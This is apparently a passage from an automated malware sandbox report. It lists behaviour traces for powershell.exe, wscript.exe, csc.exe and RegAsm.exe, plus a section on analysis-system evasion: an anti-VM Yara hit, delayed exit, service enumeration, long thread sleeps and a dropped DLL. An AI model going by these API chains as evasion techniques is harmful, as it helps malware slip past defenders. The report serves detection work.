                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX

                      Malware Analysis System Evasion

                      barindex
                      Yara detected AntiVM3
                      Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 4720, type: MEMORYSTR
                      Delayed program exit found
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_0040F7E2 Sleep,ExitProcess,11_2_0040F7E2
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle,12_2_0040DD85
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle,11_2_0041A7D9
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeWindow found: window name: WSH-TimerJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5085Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4694Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7953Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1640Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 401Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 429Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3423Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6311Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWindow / User API: threadDelayed 9362
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWindow / User API: foregroundWindowGot 1770
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDecision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)graph_11-53560
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\p44lx5ym\p44lx5ym.dllJump to dropped file
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeAPI coverage: 9.6 %
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6672Thread sleep time: -17524406870024063s >= -30000sJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6300Thread sleep count: 7953 > 30Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6156Thread sleep count: 1640 > 30Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3176Thread sleep time: -7378697629483816s >= -30000sJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6204Thread sleep count: 401 > 30Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4320Thread sleep count: 146 > 30Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6536Thread sleep count: 429 > 30Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6428Thread sleep time: -922337203685477s >= -30000sJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6584Thread sleep count: 3423 > 30Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6728Thread sleep count: 6311 > 30Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3176Thread sleep time: -15679732462653109s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2680Thread sleep count: 256 > 30
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2680Thread sleep time: -128000s >= -30000s
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2180Thread sleep count: 125 > 30
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2180Thread sleep time: -375000s >= -30000s
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2180Thread sleep count: 9362 > 30
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2180Thread sleep time: -28086000s >= -30000s
